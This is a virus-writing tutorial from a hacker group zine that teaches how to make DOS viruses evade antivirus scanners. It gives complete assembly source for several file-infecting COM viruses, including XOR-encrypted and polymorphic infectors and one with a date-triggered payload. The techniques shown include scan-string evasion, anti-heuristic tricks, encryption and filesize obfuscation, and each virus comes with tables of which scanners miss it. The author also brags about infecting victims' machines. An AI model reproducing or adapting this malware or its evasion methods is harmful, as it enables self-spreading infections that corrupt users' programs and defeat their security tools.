*** AVOIDING DETECTION
****
By Arsonic[Codebreakers]
The best thrill u get from a virus is not destroying someones computer, and causing massive mayham.. but the thrill u get from knowing that your virus has made it to the wild.. that your virus is not detectable by some of the most famous virus scanners on the face of the planet. and as these scanners get more and more sophisicated.. the need for better and newer ways to remain undetectable increases.
The Following article deals with very basic ways (yet they work) for your virus's to get past scanners.
ScanStrings
A virus scanners search executables for scanstrings which are about four plus bytes of uncommon code that will not be used in any normal programs. So your virus's should use the most common code as possible.
Also its unwise to leave strings such as *.com and *.exe unencrypted you could change these strings abit so they would not be scanstrings.. such as *.com becomes *.c* and *.exe becomes *.e*
Encryption
Encryption is a great way for a virus to hide itself from scanners and it also minimizes the number of bytes a av person has to get a scanstring from. Encryption Routines can be simple such as xor, or very complex.
-----------------------CUT HERE---------------------------------------------
start_of_xor: ;start of the virus
lea si,encryption_start ;si points to the start of the encrypted area
mov di,si
mov cx,end - encryption_start ;total number of bytes in the encrypted area
call encryption ;call the encryption routine
jmp encrption_start ;and goto the encrypted area
encryption: ;our encryption routine
lodsb ;load a byte into al
xor al,byte ptr[decrypt] ;xor the byte in al with the value from decrypt
stosb ;put the byte back
loop encryption ;and do it again until cx = 0
ret ;return from call
decrypt db 0 ;our value in which to decrypt with
encryption_start: ;start of encrypted area..
;everything passed here is encrypted
mov ah,4eh ;Dos Function 4eh (find first file)
lea dx,filemask ;the type of files to find (*.com)
find_next: ;label used for find next.. (saves bytes)
int 21h
jnc infect ;if file found.. then infect it
jmp close ;else we close
infect: ;start of the infect routine
mov ax,3d02h ;Dos Function 3d02 (openfile)
mov dx,9eh ;9eh is where the filename is in the dta
int 21h
xchg bx,ax ;put the file handle into bx
in al,40h ;get random value from system clock into al
mov byte ptr [decrypt],al ;and save it as our new decrypt key
mov ah,40h ;Dos Function 40 (Write to File)
lea dx,start_of_xor ;start of the virus
mov cx,encryption_start - start_of_xor ;total bytes to write
int 21h
lea si,encryption_start ;si points to the start of the
encrypted area
mov di,end_of_xor ;di points to end of the encrypted
area / virus
mov cx,end_of_xor - encryption_start ;cx = the total number of bytes to
encrypt
call encryption ;call the encryption routine
mov ah,40h ;Dos Function 40 (Write to File)
lea dx,encryption_start ;starting at start of encrypted area
mov cx,end_of_xor - encryption_start ;cx = total number of bytes in the
encrypted area
int 21h
mov ah,3eh ;Dos Function 3e (Close File)
int 21h
mov ah,4fh ;Dos Function 4f (Find Next File)
jmp find_next
close:
int 20h ;return control to dos
filemask db '*.com',0 ;filetype to infect
Virus db 'Xor Example',0 ;virus name
end_of_xor:
-------------------END OF CUT-----------------------------------------------
Screwing Up Heristics
Heuristics are what a virus scanner uses to detect "virus like" code. so you are not just finding and changing scanstrings nowadays when a scanner detects your code. a quick, nice and simple way to make it past heuristics is to add a value unto the register..
example:
mov ah,3eh ;right now its Dos Function 3e (Close File) add ah,2 ;add 2 to ah.. so it becomes.. 40 (write to file)
u could also put the value into another register first, add 2 to it, and then mov that value to the register needed for the function..
mov al,3eh ;what this does is exsentually the same thing. but add al,2 ;uses another register.. adds 2, and then switches it to the xchg ah,al ;right register.
----------- Cut Here ---------------------------------------------------- ; heres is a stupid little overwriter i wrote while i was attempting to write ; a unencrypted virus not yet detectable by any scanner. the code is fairly ; simple. For every Ah needed in the virus.. the value minus to is put into ; al, and a call to a routine that adds 2 to al and then switches it with ; ah. ; ; Stats: AVP NOPE ; FPROT NOPE ; TBAV NOPE ; Start_Of_Virus: Find_First: mov al,4ch call Increase_Al Find_Next: lea dx,Filemask int 21h jnc Infect jmp Close Infect: mov ax,3d02h mov dx,9eh int 21h xchg bx,ax mov al,3eh lea dx,Start_Of_Virus mov cx,End_Of_Virus - Start_Of_Virus call Increase_Al int 21h mov al,3ch call Increase_Al int 21h mov al,4dh call Increase_Al jmp Find_Next Increase_Al: add al,2 xchg al,ah ret Close: ret FileMask db '*.c*',0 ;if *.com was used it would be detected! Virus db 'Fuck The Police!',0 Author db 'Arsonic',0 End_Of_Virus: -------------------- Dont Cut Past Here ----------------------------------
heres another little trick.. which surely can be improved since it is detected as Suspicous by F-Prot. All this is, is to call a routine to do int 21h and then return.
example:
mov ah,9h ;Dos Function 9 (display string to screen) lea dx,message ;dx = bytes to write to screen call int_21h ;call the routine to do a int 21h int 20h ;return control to dos message db 'Arsonic + XHiltar',13,10,'$' ;message to write to screen int_21h: ;our little int_21h routine int 21h ;all we do is a int 21h ret ;and return ----------------------- Cut Here ------------------------------------------ start: mov ah,4eh ;dos function 4e (find first file) lea dx,filemask ;dx = type of file to find call int_21h ;call the int_21h routine jnc infect ;one found.. then infect jmp close ;else close infect: mov ax,3d02h ;open file mov dx,9eh ;location of filename in dta call int_21h ;call the int_21h routine xchg bx,ax ;put the filehandle into bx mov ah,40h ;dos function 40 (write to file) lea dx,start ;starting at start mov cx,end - start ;cx = total number of bytes to write.. from end - start call int_21h ;call our int_21h routine mov ah,3eh ;dos function 3e (close file) call int_21h ;call our int_21h routine int 20h ;return control to dos int_21h: ;int_21h routine int 21h ;do a int 21h ret ;and return filemask db '*.c*',0 ;file extension to find virus db 'Int 21h Trick' end: ------------------- Hey FUCKHEAD DONT CUT PASTE HERE! ----------------------
Random Filesize Increase
Alright.. so we've covered alot on hiding your virus from av programs.. but what about the user?. time/date restoration and attribute restoration are kickass.. because if u look at one directory and see all the exes, coms whatever have the same time and date your gonna get suspicous. Also filesize increases might be spotted by users. This little Routine will give your virus a totally random filesize, and might even confuse some stupid people..
its pretty simple.. all we do is 1) set file pointer to EOF (end of file)
2) write some garbage bytes
3) get a random value from system clock
4) compare it and see if it is time to quit
Size_Increase:
mov ax,4202h ;Dos Function 4202 (set filepointer to end of file)
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;Dos Function 40 (write to file)
lea dx,write_byte ;dx = write_byte
mov cx,3 ;we are writing 3 bytes
int 21h
in al,40h ;get value into al
and al,10 ;not greater then 10
cmp al,5 ;compare al to 5
je Close_File ;if its equal .. its time to exit
jmp Size_Increase ;else we do it all over again
write_byte db 'ARS' ;the 3 bytes we write to the end
-------------- Start of Cut ----------------------------------------------
Start:
mov ah,4eh
Find_Next:
lea dx,Filemask
int 21h
jnc Infect
jmp Close
Infect:
mov ax,3d02h
mov dx,9eh
int 21h
xchg bx,ax
mov ah,40h
lea dx,Start
mov cx,End - Start
int 21h
Meta_Morph:
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
lea dx,writebyte
mov cx,1
int 21h
in al,40h
and al,7
cmp al,6
jne Meta_Morph
jmp Close_File
Close_File:
mov ah,3eh
int 21h
mov ah,4fh
jmp Find_Next
Close:
int 20h
writebyte db 'a'
filemask db '*.com',0
Virus db 'I love Lisa'
Author db 'Arsonic'
End:
------------------ If your cutting past here.. youve gone too far----------
ok.. thats like it for this tutorial.. below are two of my other virus's just because..eh. yeah. alright fine. WHATEVER
Greetz to: Spooky -Tha Porn King
Opic -Tha Man!
Sea4 -Tha Cop Killer
HT -Future Editor For The NewYork Times
Aperson -if u want crack.. call him. (also heroin!)
Saaweetie -watch it for she will send ya a batch file!
Groucho -get better man :(
XHILTAR -I LOVE U LISA!!!!!!!!
Fuck-Yous to:
My Computer Teachers -The Dumbass's Pulled Drained all the schools cpu
batterys cause they thought elvira infected the CMOS! .. haha
and as we speak the servers are being rebuilt. Thats what they get
for having a outdated virus scanner i guess.
Cutie Pie -Hey.. U got your windows back up yet? .. hey.. i think
saaweetie has a batch file to fix that!!!!! CRASH! haha!
-------------------Start Ripping Here-------------------------------------
; Virus: The Undressed Virus
; Author: Arsonic[Codebreakers]
; Type: Appending
; Encryption: No
;
; Displays a Message on Feb 5th.
; Btw.. I Love Lisa..!
;------------------------------------------------------------------------
; AV-Product | Detected? | Comments
;------------------------------------------------------------------------
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
; AVP | VCL.824 | VCL! ARRGGGHH!
;------------------------------------------------------------------------
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;kill heristics
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
mov cx,3
nop
mov di,100h
nop
lea si,[bp+buffer]
nop
rep movsb
find_first:
mov ah,4ch
add ah,2
nop
find_next:
nop
lea dx,[bp+filemask]
nop
int 21h
jnc infect
jmp check_payload
infect:
mov ax,3d02h
mov dx,9eh
int 21h
xchg ax,bx
mov ah,3dh
add ah,2
mov cx,3
lea dx,[bp+buffer]
int 21h
mov ax,word ptr[80h + 1ah]
nop
sub ax,end - start + 3
nop
cmp ax,word ptr[bp+buffer+1]
nop
je close_file
mov ax,word ptr[80h + 1ah]
nop
sub ax,3
nop
mov word ptr[bp+three+1],ax
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+three]
nop
mov cx,3
nop
int 21h
mov ax,4202h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+start]
nop
mov cx,end - start
nop
int 21h
close_file:
mov ah,3ch
add ah,2
int 21h
mov ah,4dh
add ah,2
jmp find_next
check_payload:
mov ah,2ah
int 21h
cmp dh,2 ;is it febuary?
je next
jmp close
next:
cmp dl,5 ;the 5th?
je payload ;yes.. display the message
jmp close ;no.. return control to the program.
payload:
mov ah,9h ;display message
lea dx,[bp+message]
int 21h
int 00h ;get keypress
int 16h
int 20h ;return to dos.
close:
mov di,100h ;return control to program
jmp di
three db 0e9h,0,0
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
buffer db 0cdh,20h,0
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
author db 'Arsonic[CB]',0 ; nice scan string..
message db 'Happy Birthday Lisa!',10,13,'$'
Lisa db 'I LOVE U LISA!',0
end:
--------- STOP DA FUCKING CUTTING NOW ------------------------------------
--------- START IT AGAIN! ahhhhhhhhhhhhhhhhhhhh --------------------------
; The Xhiltar Virus
; By Arsonic[Codebreakers]
; Type: Runtime Appending Com Infector
; Encrypted: Yes
; Polymorphic: Yes
; Time/Date: Yes
; add Attrib: Yes
; Changes Directory's: Yes (dotdot method)
; Anti-Anti-Virus: Yes (anti-heristics)
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;fuck up those heristics!
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
lea si,[bp+hidden_start]
mov di,si
mov cx,end - hidden_start
call encryption
jmp hidden_start
value db 0
encryption: ;encryption routine
call poly
encrypt:
lodsb ;1
_1stDummy:
nop ;1 = +1
xor al,byte ptr[bp+value] ;4
_2ndDummy:
nop ;1 = +6
stosb ;1
_3rdDummy:
nop ;1 = +8
loop encrypt ;2
_4thDummy:
nop ;1 = +11
ret
hidden_start:
mov cx,3
mov di,100h ;restore the first 3 bytes
lea si,[bp+buff]
rep movsb
find_first: ;find first file
mov ah,4eh
find_next:
lea dx,[bp+filemask]
xor cx,cx ;with 0 attrib's..
int 21h
jnc infect
close:
push 100h
ret
infect:
mov ax,3d02h ;open file
mov dx,9eh
int 21h
xchg bx,ax
mov ax,5700h ;get time/date
int 21h
push dx ;save the values
push cx
in al,40h ;get new encrypt value from system clock
mov byte ptr [bp+value],al
mov ah,3fh ;read 3 bytes from the file.. too
mov cx,3 ;be replaced with a jump to the virus
lea dx,[bp+buff]
int 21h
mov ax,word ptr [80h + 1ah] ;check for infect
sub ax,end - start + 3
cmp ax,word ptr[bp+buff+1]
je close_file
mov ax,word ptr[80h + 1ah]
sub ax,3
mov word ptr[bp+three+1],ax
mov ax,4200h ;goto start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the 3 byte jump
lea dx,[bp+three]
mov cx,3
int 21h
mov ax,4202h ;goto end of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the unencrypted area
lea dx,[bp+start]
mov cx,hidden_start - start
int 21h
lea si,[bp+hidden_start] ;encrypt the virus
lea di,[bp+end]
mov cx,end - hidden_start
call encryption
mov ah,40h ;write encrypted area
lea dx,[bp+end]
mov cx,end - hidden_start
int 21h
close_file:
mov ax,5701h ;restore time/date
pop cx ;with saved values
pop dx
int 21h
mov ah,3eh ;close file
int 21h
mov ah,4Fh ;find next file
jmp find_next
poly:
call random ;get random value
mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt
call random
mov [bp+_2ndDummy],dl
call random
mov [bp+_3rdDummy],dl
call random
mov [bp+_4thDummy],dl
ret
garbage:
nop ; no operation instruction
clc ; Clear Carry
stc ; Set Carry
sti ; Set Interuppt Flag
cld ; Clear Direction Flag
cbw ; Convert byte to word
inc dx ; increase dx
dec dx ; decrease dx
lahf ; loads AH with flags
random:
in ax,40h
and ax,7
xchg bx,ax
add bx,offset garbage
add bx,bp
mov dl,[bx]
ret
filemask db '*.com',0
three db 0e9h,0,0
buff db 0cdh,20h,0
dotdot db '..',0
author db 'Arsonic[Codebreakers]',13,10,'$'
virus db 'the XHiLTAR virus',13,10,'$'
db 'I LOVE U LISA',13,10,'$'
db 'I LOVE U SOOOO MUCH!',13,10,'$'
end:
---------------------- End of All of it -----------------------------------
Laters Y'all
Arsonic [Codebreakers]